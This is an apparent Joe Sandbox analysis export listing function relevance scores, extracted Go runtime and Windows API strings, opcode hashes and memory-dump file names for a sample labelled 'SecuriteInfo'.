schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usagewrite B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= m$] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindopenpathpipepop3quitreadrootsbrksmtpsse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1$][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMayMroNDTNSTNULNaNNkoPC=PDTPKTPSTStdUTCVaiW$bad summary databad symbol tablecastogscanstatuscontext canceledexec: no commandgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-$runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong$runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stac$runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->$runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningupdate during transition bytes failed with errno= to unused region of span2006-01-02T15:04:05Z07:002910383045673370361328125AUS Central Standard TimeAUS Eastern Sta$runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcunknown type kindwait for GC cyclewrong medium type but memory size because dotdotdot in
API String ID: 0-3599417532
Opcode ID: 259834f1d4fbe79879912794b69815ee8c6051a78c4e6804709c99224b666a9d
Instruction ID: 206b09a51e6f8168ee0b959bfbf811f7e5c601ff9b78dcb3a06ce20f5dc62586
Opcode Fuzzy Hash: 259834f1d4fbe79879912794b69815ee8c6051a78c4e6804709c99224b666a9d
Instruction Fuzzy Hash: FB32BE76318BC481DB20AB15E9413EEB7A5F789BC0F884522DE9E17B5ACF38C559C700

Function 00A786E0 Relevance: 16.9, Strings: 13, Instructions: 694COMMON

Download Yara Rule

Strings

ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServic, xrefs: 00A791BC
failed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad , xrefs: 00A79445
@ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTD, xrefs: 00A78E65
gcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usagewrite B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util, xrefs: 00A787B7, 00A787CD
MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit15258789, xrefs: 00A79268
+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??, xrefs: 00A78FB6, 00A7912E
., xrefs: 00A78DD4
MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExChorasmian, xrefs: 00A79249
ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLI, xrefs: 00A78FE5
MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalse, xrefs: 00A79227
MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFree, xrefs: 00A79287
gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid function symbol tableinvalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rang, xrefs: 00A79456
(forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksuk, xrefs: 00A792C9

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksuk$ @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTD$ MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFree$ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExChorasmian$ MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit15258789$ MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalse$ ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDives_AkuruEnumWindowsExitProcessFreeLibraryGOMEMLI$ ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServic$+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??$.$failed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad $gc done but gcphase != _GCoffgfput: bad status (not Gdead)invalid function symbol tableinvalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rang$gcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usagewrite B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util
API String ID: 0-2568472171
Opcode ID: 273cc599e7fe36fdf440833a590d95d0c09c490a168381a04a91d1335d52466e
Instruction ID: a6108637d6d78ba9910686790e9188b9fa6098cbe1002e0604b491c3046d70a3
Opcode Fuzzy Hash: 273cc599e7fe36fdf440833a590d95d0c09c490a168381a04a91d1335d52466e
Instruction Fuzzy Hash: F6728D36319B84C5FB20DF25E9817AAB7A4F74AB80F448226DA8D47766DF3DC445CB10

Function 00A6C020 Relevance: 15.4, Strings: 12, Instructions: 383COMMON

Download Yara Rule

Strings

runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeskip everything and stop the walkslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent loc, xrefs: 00A6C725
, ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOF, xrefs: 00A6C745
memory reservation exceeds address space limitos: unexpected result from WaitForSingleObjectpanicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new , xrefs: 00A6C78F
) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625Central Brazilian Standard TimeCertDuplicateCertificateContextMountain Standard Time (Mexico)SetupDiGetDe, xrefs: 00A6C765
region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowed45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentr, xrefs: 00A6C66A
out of memory allocating heap arena metadatareflect: funcLayout with interface receiver runtime: lfstack.push invalid packing: node=span on userArena.faultList has invalid sizeunsafe.Slice: ptr is nil and len is not zerouse of WriteTo with pre-connected connec, xrefs: 00A6C3DF
arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing tr, xrefs: 00A6C3F0
, xrefs: 00A6C6B2
out of memory allocating allArenasreflect: Field index out of boundsreflect: Field of non-struct type reflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of ra, xrefs: 00A6C3CE
end outside usable address spaceinvalid limiter event type foundnumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt, xrefs: 00A6C6C2
base outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanmin must be a non-zero power of 2misrounded allocation in sysAllocreflect.nameFrom: name too long: reflect: Field index out of r, xrefs: 00A6C694
out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre, xrefs: 00A6C405

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625Central Brazilian Standard TimeCertDuplicateCertificateContextMountain Standard Time (Mexico)SetupDiGetDe$, ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOF$arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing tr$base outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanmin must be a non-zero power of 2misrounded allocation in sysAllocreflect.nameFrom: name too long: reflect: Field index out of r$end outside usable address spaceinvalid limiter event type foundnumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt$memory reservation exceeds address space limitos: unexpected result from WaitForSingleObjectpanicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new $out of memory allocating allArenasreflect: Field index out of boundsreflect: Field of non-struct type reflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of ra$out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre$out of memory allocating heap arena metadatareflect: funcLayout with interface receiver runtime: lfstack.push invalid packing: node=span on userArena.faultList has invalid sizeunsafe.Slice: ptr is nil and len is not zerouse of WriteTo with pre-connected connec$region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowed45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentr$runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeskip everything and stop the walkslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent loc
API String ID: 0-961143722
Opcode ID: b011e075870ebda6bca1067d17ca97eff0aaed43e68226d930820f85c69f4d60
Instruction ID: c4eb39c1e3d2fe424be4a6100321da8c6f2cd4a7a635b33044d93140256d0917
Opcode Fuzzy Hash: b011e075870ebda6bca1067d17ca97eff0aaed43e68226d930820f85c69f4d60
Instruction Fuzzy Hash: 20027872609B8482DB60DB66E4507AAB7B4F389BA0F448222EFED47799CF3CC540C700

Function 00AAC260 Relevance: 12.9, Strings: 10, Instructions: 371COMMON

Download Yara Rule

Strings

locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "GetProcessPreferredU, xrefs: 00AAC7A5
args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextEnglish name for time zone "FindFirs, xrefs: 00AAC62F
), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE, xrefs: 00AAC66F, 00AAC7E5
bad symbol tablecastogscanstatuscontext canceledexec: no commandgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobje, xrefs: 00AAC68A, 00AAC7FB
+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??, xrefs: 00AAC705, 00AAC877
runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.LocktimeBeginPeriodtraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcd, xrefs: 00AAC6C6, 00AAC834
runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not foundzero length segment markroot jobs done to unallocated span37252902984, xrefs: 00AAC5F1, 00AAC769
untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worke, xrefs: 00AAC6E6
and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefault, xrefs: 00AAC611, 00AAC786
(targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHE, xrefs: 00AAC654, 00AAC7C5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHE$ and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedeferfalsefault$ args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextEnglish name for time zone "FindFirs$ locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "GetProcessPreferredU$ untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worke$), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETE$+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??$bad symbol tablecastogscanstatuscontext canceledexec: no commandgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobje$runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding psync.Mutex.LocktimeBeginPeriodtraceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcd$runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not foundzero length segment markroot jobs done to unallocated span37252902984
API String ID: 0-2011476427
Opcode ID: a56a319522eaf1e8ebf6c192f6e3e2c2a2f9e4791c7f6772becc38612e77393d
Instruction ID: 282bf41f3f69ef8d05d5ecb75081a1a1aa0f0ba4ada75513e1bfa4f8a91fb76c
Opcode Fuzzy Hash: a56a319522eaf1e8ebf6c192f6e3e2c2a2f9e4791c7f6772becc38612e77393d
Instruction Fuzzy Hash: A1F1C536318B8096DB60EF25E58079EB7A4F78AB90F549021EF8D47B66DF38C944CB10

Function 00A6CB60 Relevance: 8.0, Strings: 6, Instructions: 517COMMON

Download Yara Rule

Strings

malloc deadlockmisaligned maskmissing addressmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm, xrefs: 00A6D365
malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not empty, xrefs: 00A6D350
!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 00A6CEBA
mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinelimiterEvent.stop: invalid limiter event type foundpotentia, xrefs: 00A6D376
mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset, xrefs: 00A6D33F
delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unex, xrefs: 00A6D2F7

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
